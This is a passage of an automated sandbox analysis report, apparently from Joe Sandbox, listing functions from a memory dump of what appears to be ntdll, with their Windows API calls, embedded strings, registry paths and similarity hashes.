RtlGetCurrentServiceSessionId.210A(?,?,00000000,?,?,?,?,?,00000000,?,?,00000120,?,7271F938,00000050,726719D8), ref: 72671660
ZwSetInformationWorkerFactory.210A(?,0000000D,00000000,00000004,00000024,000F00FF,00000000,?,000000FF,7266C8C0,00000000,7FFE03C0,?,?,00000028,001F0003), ref: 7267168A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap$CreateFactoryHeaderImageWorker$AcquireCompletionCurrentExclusiveInformationLockServiceSession
String ID:
API String ID: 358453882-0
Opcode ID: 59db9f6f0c7807e99e33c9aa0d2710348c869ff85ab75606a083f671b70a5e78
Instruction ID: a4c70bc8ff0778f9d67df2a9cba88d8917013cfc97b20f7ed4a40879b16b8424
Opcode Fuzzy Hash: 59db9f6f0c7807e99e33c9aa0d2710348c869ff85ab75606a083f671b70a5e78
Instruction Fuzzy Hash: 34B144B19002499FCB16CFA9DA40B9EBBF5FB48314F24456FE50AAB790DB34A901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 726D34C9, Relevance: 15.2, APIs: 10, Instructions: 218nativememoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,00000000,?,00000000), ref: 726D3558
ZwOpenKey.210A(?,00000001,72621B10,?,00000008,00000000,?,00000000), ref: 726D358C

Part of subcall function 7268A300: LdrInitializeThunk.NTDLL(7264E062,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 7268A30A

ZwClose.210A(?,?,00000001,72621B10,?,00000008,00000000,?,00000000), ref: 726D35C3
ZwQueryValueKey.210A(?,72621B00,00000002,?,00000010,?,?,00000008,00000000,?,00000000), ref: 726D35F3
RtlQueryEnvironmentVariable_U.210A(00000000,72621B08,02080000,?,00000008,00000000,?,00000000), ref: 726D3629
ZwQueryValueKey.210A(000000FF,02000000,00000002,?,00000214,?,000000FF,00000000,00000000,?,0000020C,?,00000000,72621B08,02080000,?), ref: 726D36D4
RtlExpandEnvironmentStrings_U.210A(00000000,02080000,02080000,00000000,000000FF,02000000,00000002,?,00000214,?,000000FF,00000000,00000000,?,0000020C,?), ref: 726D3721
ZwEnumerateValueKey.210A(000000FF,00000000,00000000,?,0000020C,?,00000000,72621B08,02080000,?,00000008,00000000,?,00000000), ref: 726D375B
RtlFreeHeap.210A(00000000,00000000,?,00000008,00000000,?,00000000), ref: 726D37A7
RtlFreeHeap.210A(00000000,00000000,?,00000008,00000000,?,00000000), ref: 726D37BB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: HeapQueryValue$EnvironmentFree$AllocateCloseEnumerateExpandInitializeOpenStrings_ThunkVariable_
String ID:
API String ID: 1470152985-0
Opcode ID: 824e32fe35ef9e04ce235fa62fb8b1de5fa6eabdd39c5ec142d3e017e265dc57
Instruction ID: c4c2f25e2ad03819cbdb18cf0401d899a39d0fd7d6adf727a12b2fe77d014eeb
Opcode Fuzzy Hash: 824e32fe35ef9e04ce235fa62fb8b1de5fa6eabdd39c5ec142d3e017e265dc57
Instruction Fuzzy Hash: 2E81A4B1A0165D9FDF21CE1DCD40B9A77BAAB84315F5002EAE51A972C0DB32CEA5CF44

Uniqueness

Uniqueness Score: -1.00%

Function 7266B2A0, Relevance: 15.1, APIs: 10, Instructions: 124threadmemoryCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockShared.210A(?,7271F810,0000001C,72642C6C,?,00000000,?,00000003,?,726427A2,00000003), ref: 7266B2EE
TpAllocPool.210A(00000000,00000000,7271F810,0000001C,72642C6C,?,00000000,?,00000003,?,726427A2,00000003), ref: 7266B32E
RtlAcquireSRWLockExclusive.210A(?,00000000,00000000,7271F810,0000001C,72642C6C,?,00000000,?,00000003,?,726427A2,00000003), ref: 7266B341
TpSetPoolMaxThreads.210A(00000000,7FFE03C0,?,00000000,00000000,7271F810,0000001C,72642C6C,?,00000000,?,00000003,?,726427A2,00000003), ref: 7266B387
TpSetPoolMaxThreadsSoftLimit.210A(00000000,7FFE03C0,00000000,7FFE03C0,?,00000000,00000000,7271F810,0000001C,72642C6C,?,00000000,?,00000003,?,726427A2), ref: 7266B3A3
TpSetPoolMaxThreads.210A(00000000,00000001,?,00000000,00000000,7271F810,0000001C,72642C6C,?,00000000,?,00000003,?,726427A2,00000003), ref: 7266B3F1
TpSetPoolMinThreads.210A(00000000,00000001,00000000,00000001,?,00000000,00000000,7271F810,0000001C,72642C6C,?,00000000,?,00000003,?,726427A2), ref: 7266B3F9

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Pool$Threads$AcquireLock$AllocExclusiveLimitSharedSoft
String ID:
API String ID: 4196657934-0
Opcode ID: 20382f92fba95b81eea39a6528cc9271b37663779c56f9fac424e6a1e0256df4
Instruction ID: 3a8372f409bc145cbda0474ae284bc112519e68a93ca933761074241c0e791e2
Opcode Fuzzy Hash: 20382f92fba95b81eea39a6528cc9271b37663779c56f9fac424e6a1e0256df4
Instruction Fuzzy Hash: F541AFB1B00245DFDB129FACC840BAE7AB6AF58314F28145BE541F72D1DB789941C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 726451E0, Relevance: 15.1, APIs: 10, Instructions: 107memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 72645275: RtlEnterCriticalSection.210A(727379A0,?,00000000,?), ref: 7264528F
Part of subcall function 72645275: RtlLeaveCriticalSection.210A(727379A0,727379A0,?,00000000,?), ref: 726452AD

memcpy.210A(?,?), ref: 7264522B
RtlLeaveCriticalSection.210A(727379A0), ref: 726A1A8E
RtlLeaveCriticalSection.210A(727379A0), ref: 726A1AD4
ZwClose.210A(?), ref: 726A1AE7
RtlFreeHeap.210A(?,00000000,00000000,?), ref: 726A1AF8
RtlLeaveCriticalSection.210A(727379A0), ref: 726A1B0A
ZwClose.210A(?), ref: 726A1B17
RtlFreeHeap.210A(?,00000000,00000000,?), ref: 726A1B28

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$Leave$CloseFreeHeap$Entermemcpy
String ID:
API String ID: 3163955863-0
Opcode ID: 834f187109c0072cea2b3c641dc57d6868550ae154c80e3c8d064b5e26dbdeab
Instruction ID: 262fdc63a3dcf0a1a94b8c5920404a97cac95fdc2b4cb9065ba50fbcd021d998
Opcode Fuzzy Hash: 834f187109c0072cea2b3c641dc57d6868550ae154c80e3c8d064b5e26dbdeab
Instruction Fuzzy Hash: 3931F071205A19EBC3278B1CC9A0B567BB6EF10760F11565BED964B0E9EB209E40C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 7267F289, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 297threadCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(72737B60,00000000,00000000,00000000,7267F281,00000000,?,727384D8,00000000,00000000), ref: 7267F2A1
RtlLeaveCriticalSection.210A(72737B60,72737B60,00000000,00000000,00000000,7267F281,00000000,?,727384D8,00000000,00000000), ref: 7267F2C5

Part of subcall function 7265DB60: RtlpNotOwnerCriticalSection.210A(?,?,?), ref: 7265DB97

TpPostWork.210A(72737B60,72737B60,00000000,00000000,00000000,7267F281,00000000,?,727384D8,00000000,00000000), ref: 7267F2E8
RtlpCreateProcessRegistryInfo.210A(727384D8,?,72737B60,7267F281,00000000,?,727384D8,00000000,00000000), ref: 7267F35B
RtlGetThreadPreferredUILanguages.210A(00000000,7267F281,00000000,00000000,00000000,727384D8,?,72737B60,7267F281,00000000,?,727384D8), ref: 7267F454

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 726BB5FC
`{sr, xrefs: 7267F29B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$Rtlp$CreateEnterInfoLanguagesLeaveOwnerPostPreferredProcessRegistryThreadWork
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$`{sr
API String ID: 3677669586-1270439173
Opcode ID: 54995f79e2233f98751677ff7f06bbf28752de350f46e0db3ee0f6d5499aa66a
Instruction ID: 25fb73a3f918cca15edee36c53119118576f14be34a9ded156b04aa5f3fb56c7
Opcode Fuzzy Hash: 54995f79e2233f98751677ff7f06bbf28752de350f46e0db3ee0f6d5499aa66a
Instruction Fuzzy Hash: BBA1E031A006468BDB26CF6DD850BAA77B5BF44724F20413BD8569B7C6EB38D842CB84

Uniqueness

Uniqueness Score: -1.00%

Function 72655680, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 291libraryCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,?,7271F348,00000044,726554B9,?,00000000,?,00001000,00000001,?,00000000,02BE0000), ref: 726556F6
RtlGetCurrentServiceSessionId.210A(-00001030,72624F0C,00000003,?,?,00000000,00000000,?,?,?,?,7271F348,00000044,726554B9,?,00000000), ref: 7265573D

Part of subcall function 7265C1C0: RtlImageNtHeaderEx.210A(00000001,?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7265C23A
Part of subcall function 7265C1C0: RtlAcquireSRWLockShared.210A(7273861C,00000001,?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7265C258

LdrpResGetMappingSize.210A(?,?,00000000,00000000,?,?,?,?,7271F348,00000044,726554B9,?,00000000,?,00001000,00000001), ref: 7265597C
RtlGetCurrentServiceSessionId.210A(?,?,?,?,7271F348,00000044,726554B9,?,00000000,?,00001000,00000001,?,00000000,02BE0000), ref: 726A9BB6

Strings

LdrResGetRCConfig Enter, xrefs: 726556C2
MUI, xrefs: 72655698, 72655797
LdrResGetRCConfig Exit, xrefs: 726556D4

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession$AcquireHeaderImageLdrpLockMappingSharedSize
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 2713120424-1145731471
Opcode ID: 6d5f1df971971f5f12cc3850b0ca353f3309824fd32dcbbc801b30fb0eea66d1
Instruction ID: 9c1a64c2f07acca926addbb308b8dd5c78db7f6477f77ba8e7742b7e27533b76
Opcode Fuzzy Hash: 6d5f1df971971f5f12cc3850b0ca353f3309824fd32dcbbc801b30fb0eea66d1
Instruction Fuzzy Hash: 0BB1AE31A01655DBDB19CE6EC994B9DB776AF44328F20402AF852EB2C8E734AD50CB85

Uniqueness

Uniqueness Score: -1.00%

Function 7270221F, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104nativeCOMMON

Download Yara Rule

APIs

ZwCreateSection.210A(00000000,000F001F,00000000,?,00000004,08000000,00000000,727379A0,0000000C,HEAP: ), ref: 72702260

Part of subcall function 7268A6A0: LdrInitializeThunk.NTDLL(726D1499,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 7268A6AA

ZwMapViewOfSection.210A(00000000,000000FF,00000000,00000000,?,00000000,s#pr,00000002,00000000,00000004,00000000,000F001F,00000000,?,00000004,08000000), ref: 72702289

Part of subcall function 7268A480: LdrInitializeThunk.NTDLL(726D14B9,?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?,?,00000004), ref: 7268A48A

memset.210A(?,00000000,00000040,00000000,000000FF,00000000,00000000,?,00000000,s#pr,00000002,00000000,00000004,00000000,000F001F,00000000), ref: 727022A4

Part of subcall function 726ECF10: ZwAllocateVirtualMemory.210A(?), ref: 726ECF53
Part of subcall function 726ECF10: ZwDuplicateObject.210A(000000FF,?,?,?,000F001F,00000000,00000000,00000003,00000000,00000000,00000000,?,726ECAF0,00003000,00003000,?), ref: 726ECFA1
Part of subcall function 726ECF10: ZwWriteVirtualMemory.210A(?,?,?,00000040,00000000,00000003,00000000,00000000,00000000,?,726ECAF0,00003000,00003000,?,?), ref: 726ECFBD
Part of subcall function 726ECF10: ZwTerminateThread.210A(00000004,00000000,00000003,00000000,00000000,00000000,?,726ECAF0,00003000,00003000,?,?), ref: 726ECFDF
Part of subcall function 726ECF10: ZwClose.210A(00000004,00000004,00000000,00000003,00000000,00000000,00000000,?,726ECAF0,00003000,00003000,?,?), ref: 726ECFE5
Part of subcall function 726ECF10: ZwFreeVirtualMemory.210A(?,00003000,?,00008000,?), ref: 726ED005

memcpy.210A(00000000,00000000,?,727379A0,0000000C,HEAP: ), ref: 727022F4
ZwUnmapViewOfSection.210A(000000FF,00000000,00000000,000F001F,00000000,?,00000004,08000000,00000000,727379A0,0000000C,HEAP: ), ref: 7270230A
ZwClose.210A(00000000,00000000,000F001F,00000000,?,00000004,08000000,00000000,727379A0,0000000C,HEAP: ), ref: 72702318

Strings

s#pr, xrefs: 72702279, 7270227C
HEAP: , xrefs: 72702227

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MemorySectionVirtual$CloseInitializeThunkView$AllocateCreateDuplicateFreeObjectTerminateThreadUnmapWritememcpymemset
String ID: HEAP: $s#pr
API String ID: 1795774993-236685795
Opcode ID: d506ed6e3c84296d0857692c3999eb03a7f3b9fd46dc8d5b18275bf4cb052d29
Instruction ID: df4394f8aa6a2df8da52ea5df66bc9010a75c4f18cb3d6247078b23acbc848af
Opcode Fuzzy Hash: d506ed6e3c84296d0857692c3999eb03a7f3b9fd46dc8d5b18275bf4cb052d29
Instruction Fuzzy Hash: F6316372E0010DAFDB14CB98CC45BAFBBB9EF44314F10416AE915AB384EB74AD05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 7267F76C, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 100nativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A(?,\Registry\Machine\SOFTWARE\Policies\Microsoft\WindowsStore,?,?,?), ref: 7267F7A2
ZwOpenKey.210A(?,00020019,?), ref: 7267F7D5

Strings

AutoDownload, xrefs: 726BB942
\Registry\Machine\SOFTWARE\Policies\Microsoft\WindowsStore, xrefs: 7267F794
DisableStoreApps, xrefs: 726BB99C
@, xrefs: 7267F7C8

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitOpenStringUnicode
String ID: @$AutoDownload$DisableStoreApps$\Registry\Machine\SOFTWARE\Policies\Microsoft\WindowsStore
API String ID: 3946626324-1446860424
Opcode ID: d03ca1762da5e50f89d9b31bddda3dc280e52a5f29c0bf4a20b43ab9c81c8667
Instruction ID: b76001c6043fb83357de3ef8fa702a3d6d3d528b67b1169b3a9d8ebaa8a6e6f6
Opcode Fuzzy Hash: d03ca1762da5e50f89d9b31bddda3dc280e52a5f29c0bf4a20b43ab9c81c8667
Instruction Fuzzy Hash: FC314DB1D0021DEFDB02DF99D984EDEBBB9FF48214F60452BE502A7241D7309A45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 726F3740, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98memorytimeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(72738A6C,?,00000000,00000000,?,?,?,?,?,?,726F36AA,00000000,00008000,?), ref: 726F377A
RtlReleaseSRWLockExclusive.210A(72738A6C,72738A6C,?,00000000,00000000,?,?,?,?,?,?,726F36AA,00000000,00008000,?), ref: 726F37A1
RtlDebugPrintTimes.210A(?,?,72738A6C,72738A6C,?,00000000,00000000,?,?,?,?,?,?,726F36AA,00000000,00008000), ref: 726F37B0
RtlAcquireSRWLockExclusive.210A(72738A6C,?,?,?,?,?,?,726F36AA,00000000,00008000,?), ref: 726F37C6
RtlReleaseSRWLockExclusive.210A(72738A6C,72738A6C,?,00000000,00000000,?,?,?,?,?,?,726F36AA,00000000,00008000,?), ref: 726F381A
RtlFreeHeap.210A(?,00000000,72738A6C,72738A6C,72738A6C,72738A6C,?,00000000,00000000,?,?,?,?,?,?,726F36AA), ref: 726F384E

Strings

hWsr, xrefs: 726F37FE
hWsr, xrefs: 726F3785

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$DebugFreeHeapPrintTimes
String ID: hWsr$hWsr
API String ID: 1017367878-3691184009
Opcode ID: e7ba69da4f14275841ee882cb704add41e10440f589033fabf53675d04cadfbd
Instruction ID: b5fc248e1d58d231c05d49108152c4847294dbd5059070585224247d0821297e
Opcode Fuzzy Hash: e7ba69da4f14275841ee882cb704add41e10440f589033fabf53675d04cadfbd
Instruction Fuzzy Hash: 30318CB1909382CFCB01CF18C58051ABFF2FF85304F45896EE8959B292D730D915CB96

Uniqueness

Uniqueness Score: -1.00%

Function 72685040, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86nativeCOMMON

Download Yara Rule

APIs

ZwDuplicateObject.210A(000000FF,?,000000FF,?,00000818,00000000,00000000,7271FE40,00000094,72685022,00000000,000000FE,0000000C,?,00000004,00000000), ref: 726BE741

Strings

ThreadPool: attempt to terminate a worker thread via handle %pContact the owner of the function calling Terminate/Exit thread., xrefs: 726BE7D7

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DuplicateObject
String ID: ThreadPool: attempt to terminate a worker thread via handle %pContact the owner of the function calling Terminate/Exit thread.
API String ID: 3677547684-1872854092
Opcode ID: bc1952ba0be9baec65e4561576fc11665307cf353ea1b6e0fa44c7253c583662
Instruction ID: 361328c28d84e72c546b98863208ffcd8f4d9bbd934015d89524eb7c74f7b94f
Opcode Fuzzy Hash: bc1952ba0be9baec65e4561576fc11665307cf353ea1b6e0fa44c7253c583662
Instruction Fuzzy Hash: 49316C70904249DEEB21CFA8CC80B8EBBB8FF04314F60416AEA59A71C5D7759980CF95

Uniqueness

Uniqueness Score: -1.00%

Function 726D37D3, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(72738608,00000000,0000000C,727379E4,726BFAB6,?,00000000,0000000C,72624E18,0000000C,00000000,?,72738480,?,00000000,0000000C), ref: 726D37DD
RtlReleaseSRWLockExclusive.210A(72738608,72738608,00000000,0000000C,727379E4,726BFAB6,?,00000000,0000000C,72624E18,0000000C,00000000,?,72738480,?,00000000), ref: 726D380B
RtlFreeHeap.210A(?,00000000,00000000,72738608,72738608,00000000,0000000C,727379E4,726BFAB6,?,00000000,0000000C,72624E18,0000000C,00000000,?), ref: 726D3821
RtlFreeHeap.210A(?,00000000,00000000,72738608,72738608,00000000,0000000C,727379E4,726BFAB6,?,00000000,0000000C,72624E18,0000000C,00000000,?), ref: 726D3836
RtlFreeHeap.210A(?,00000000,00000000,72738608,72738608,00000000,0000000C,727379E4,726BFAB6,?,00000000,0000000C,72624E18,0000000C,00000000,?), ref: 726D384B

Strings

Dnsr, xrefs: 726D37F8
Hnsr, xrefs: 726D37E2
Lnsr, xrefs: 726D37EC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FreeHeap$ExclusiveLock$AcquireRelease
String ID: Dnsr$Hnsr$Lnsr
API String ID: 1406246216-3892644859
Opcode ID: a67ffbc122c5ab42aadac6f87a37f397a1e6b7470a950c104a3ab1a39e74b723
Instruction ID: 76e11726396965542c18cfd665871a96d9e00bd41179e9dad14e3ee2f90dae1f
Opcode Fuzzy Hash: a67ffbc122c5ab42aadac6f87a37f397a1e6b7470a950c104a3ab1a39e74b723
Instruction Fuzzy Hash: A5F044766815E4A7DB235BBDCF44F263E66EBC0B50F91042AA6025B2D2DA74CC05C658

Uniqueness

Uniqueness Score: -1.00%

Function 726642B0, Relevance: 13.9, APIs: 9, Instructions: 444memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,?,?,726B155A,?,?), ref: 7266442E
memmove.210A(?,?,?,?,00000000,?,?,726B155A,?,?), ref: 7266449D
memmove.210A(?,?,?,?,00000000,?,?,726B155A,?,?), ref: 7266451E

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: memmove$AllocateHeap
String ID:
API String ID: 1771830547-0
Opcode ID: b3da52cd4cd093fec11811eabf0e35e59af4426b73c144e405160b309291714c
Instruction ID: 8cf541b3f106ed02746b67fa32ac103e2e99e1baf50aa03ead8f07339c47d498
Opcode Fuzzy Hash: b3da52cd4cd093fec11811eabf0e35e59af4426b73c144e405160b309291714c
Instruction Fuzzy Hash: 71F149746082518BC725CF1DC490A3ABBF2AF89758F14492FF48ACB290E735D891CB92

Uniqueness

Uniqueness Score: -1.00%

Function 7267D1B7, Relevance: 13.6, APIs: 9, Instructions: 144nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?), ref: 7267D1EC
RtlAcquireSRWLockExclusive.210A(?,?), ref: 7267D1F9

Part of subcall function 72661ED0: RtlDllShutdownInProgress.210A(00000000), ref: 72661F0A
Part of subcall function 72661ED0: ZwWaitForAlertByThreadId.210A(?,00000000,?,?,?,?,?,?,?,00000000), ref: 72661FF3

RtlGetCurrentServiceSessionId.210A(?,?,?,?,?,?,?,?,?,?,7264A605,?), ref: 7267D208
ZwSubscribeWnfStateChange.210A(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,7264A605,?), ref: 7267D282
RtlReleaseSRWLockExclusive.210A(?,?,?,?,?,?,?,?,?,?,?,?,7264A605,?), ref: 7267D2B3
RtlReleaseSRWLockExclusive.210A(?,?,?,?,?,?,?,?,?,?,?,?,?,7264A605,?), ref: 7267D2C1
RtlReleaseSRWLockExclusive.210A(?,?,?,?,?,?,?,?,?,?,?,7264A605,?), ref: 726BA937
RtlReleaseSRWLockExclusive.210A(?,?,?,?,?,?,?,?,?,?,?,?,7264A605,?), ref: 726BA945

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire$AlertChangeCurrentProgressServiceSessionShutdownStateSubscribeThreadWait
String ID:
API String ID: 15014472-0
Opcode ID: 1e1677e0319b718404e9534a193d6fd2007327baf1a9e0a190b8d584ca8571d2
Instruction ID: b16ae9396977abe361ac5b598390584917a89bdfee65fd418b50a998e53e5865
Opcode Fuzzy Hash: 1e1677e0319b718404e9534a193d6fd2007327baf1a9e0a190b8d584ca8571d2
Instruction Fuzzy Hash: A241CA726043019FD715DF2CD880A1ABBEAEF98214F114C2FE696C3395DB34E846CB85

Uniqueness

Uniqueness Score: -1.00%

Function 7267328D, Relevance: 13.6, APIs: 9, Instructions: 131memorynativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(72738504,72735338,00000000,72735320), ref: 726732D9
memset.210A(?,00000000,00000078,72738504,72735338,00000000,72735320), ref: 726732F7
ZwTraceControl.210A(0000001E,00000000,00000018,?,00000078,?,72735338,00000000,72735320), ref: 7267333E
RtlReleaseSRWLockExclusive.210A(72738504,C0000017,?,00000008,?,0000001E,00000000,00000018,?,00000078,?,72735338,00000000,72735320), ref: 7267337C
RtlSetLastWin32Error.210A(00000000,72738504,C0000017,?,00000008,?,0000001E,00000000,00000018,?,00000078,?,72735338,00000000,72735320), ref: 726733AD
RtlFreeHeap.210A(?,00000000,?,0000001E,00000000,00000018,?,00000078,?,72735338,00000000,72735320), ref: 726B47EE
RtlAllocateHeap.210A(?,00000008,?,0000001E,00000000,00000018,?,00000078,?,72735338,00000000,72735320), ref: 726B4804

Memory Dump Source

